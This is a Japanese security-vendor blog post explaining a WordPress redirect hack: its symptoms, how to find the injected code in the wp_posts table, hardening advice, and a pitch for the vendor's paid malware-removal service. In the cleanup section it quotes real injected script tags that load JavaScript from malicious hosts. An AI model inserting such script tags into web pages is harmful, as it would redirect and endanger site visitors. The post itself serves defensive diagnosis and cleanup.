WordPressブログが悪意あるドメインへリダイレクト?原因の特定と今すぐできる対処法
WordPressのリダイレクトハックは、長年にわたり多くのサイト運営者を悩ませてきた深刻な脅威です。この手の攻撃は数週間ごとに姿を変え、新たな手法が次々と登場しています。本記事では、その中でも「ブログページの訪問者を悪意のあるドメインへ強制的に転送する」タイプのハックについて、症状の見分け方から駆除・再発防止策まで詳しく解説します。
これまでに確認されている悪意のあるドメインには、adaranth.[com]、buyittraffic.[com]、cuttraffic.[com]、statistic[.]admarketlocation[.]com、planeobservetoo1[.]live などがあります。
感染しているかどうかを確認する方法
1. 症状を観察する
- 訪問者が意図しないドメインへリダイレクトされる
- ブログページのGoogle検索順位が急に低下している
- 不正なサイト行為に関する警告メッセージがGoogleから届く
- ウェブサイトがブラックリストに登録されている(専用ツールで簡単に確認できます)
- ページのソースコードに見覚えのない悪意のあるリンクが含まれている
当社のツールは65以上のブラックリストをスキャンし、あなたのサイトが登録されていないかを一括チェックします。
上記の症状に一つでも心当たりがある場合は、サイトがハッキングされている可能性が高いといえます。
WordPressブログが勝手にリダイレクトされる?今すぐ修正しましょう!
2. マルウェアスキャナーで確認する
より確実に判断したい場合は、マルウェアスキャナーでサイト全体をスキャンしましょう。オンライン型のスキャナーなら、サイトのURLを入力して「スキャン」ボタンを押すだけで、誰でも簡単に診断できます。
ハックされた箇所を見つける方法
ほとんどのリダイレクトハックには共通の手口があります。それは、データベースまたはコアファイルへの悪意のあるコード注入です。今回のケースも例外ではありませんでした。
ハックを分析した結果、攻撃者はデータベースに悪意のあるコードを直接注入したものと結論付けられました。
最も可能性が高いのは、データベースのwp_postsテーブル(サイトの全投稿を格納するテーブル)にJavaScriptコードが仕込まれたパターンです。
データベースの確認手順は以下の通りです。
- PHPMyAdminでデータベースにアクセスする
- wp_postsテーブルを開き、リダイレクトが発生している投稿を探して、投稿内を「adaranth.[com]」(またはその他の悪意のあるドメイン)で検索(Ctrl + F)する
実際に確認された悪意のあるコードの例はこちらです。
<script src=“https://trafficpage.cool/addons/lnkr5.min.js” type=“text/javascript“></script><script src=“https://trafficpage.cool/addons/lnkr30_nt.min.js” type=“text/javascript“></script><script src=“https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5953x&r=1536317274530” type=“text/javascript“></script>
また、別の被害サイトからは次のような悪意のあるスクリプトも検出されています。
<script src='https://dl.gotosecond2.com/clizkes' type='text/javascript'></script>
次にすべきこと
感染を完全に駆除し、サイトを安全な状態へ戻しましょう。
マルウェアの駆除を先延ばしにするほど、SEOへの悪影響や訪問者の信頼低下など、被害は拡大していきます。Astraの即日対応マルウェア駆除プログラムを利用すれば、申し込み当日にサイトのクリーニングが完了します。プロフェッショナルな駆除の手順は非常にシンプルです。
- Astraのマルウェア駆除プログラムに申し込む
- サーバーの認証情報を更新する――これだけで完了です
経験豊富なセキュリティエンジニアが、6〜8時間以内に感染部分と隠れたバックドアをすべて駆除します。さらに、クリーンアップ後にはAstraの実績あるファイアウォールがサイトに導入され、今後同様の攻撃からサイトを守り続けます。
まとめ
サイトがきれいになり正常に動作するようになったら、推奨されるWordPressのセキュリティ対策を実践して、再発を防ぎましょう。主な対策は以下の通りです。
- サイトおよびサーバーのすべてのアカウントに強力なパスワードを設定し、定期的に変更する
- デフォルトの管理画面URLを推測されにくい独自のものに変更する
- WordPressのファイル・フォルダのパーミッションを適切に設定する
- 管理エリアへのアクセスをIPアドレスなどで制限する
- ログイン試行回数に上限を設ける、など
駆除プログラムやAstraについてご不明な点がありますか?ぜひチャットでお気軽にお問い合わせください。
-
WordPressサイトがbuyittraffic[.com]などに勝手にリダイレクトされる malware の原因と今すぐできる解決策
WordPressサイトを狙った大規模リダイレクトマルウェアが再び猛威を振るう WordPressサイトを標的とした大規模なリダイレクト型マルウェアが再び拡散しています。サイトが見知らぬドメインへ勝手に転送されたり、管理画面でエラーが発生したりと、多くのサイト運営者から相談が寄せられました。 これらのサイトの駆除作業を進める中で、感染手法に共通点があることが判明しました。すべて同一のリダイレクトマルウェアによる被害です。まず「buyittraffic[.com]」という悪意あるドメインへリダイレクトされ、その後「sinowncrers12[.]live」「cuttraffic[.com]」「p
-
Google検索経由で偽アダルト出会い系サイトへリダイレクトされるマルウェアとは?WordPress・Magento・Joomlaの対処法
近年、Webサイトの訪問者を偽のアダルト出会い系サイトへ強制的に誘導する、新種のリダイレクト型マルウェアが猛威を振るっています。このマルウェアキャンペーンでは、被害サイトに数千件もの偽ページが自動生成され、それらがGoogle検索にインデックスされます。site:example.com のように検索してみると、以下のような不正なページが大量にヒットすることがあります。 このマルウェアは、出会い系サイトだけでなく、エッセイ(代行記事)、医薬品、ローン、メディア、悪意のあるダウンロードスパムサイトなど、さまざまなジャンルの偽ページとリダイレクトを生成することでも知られています。 関連記事: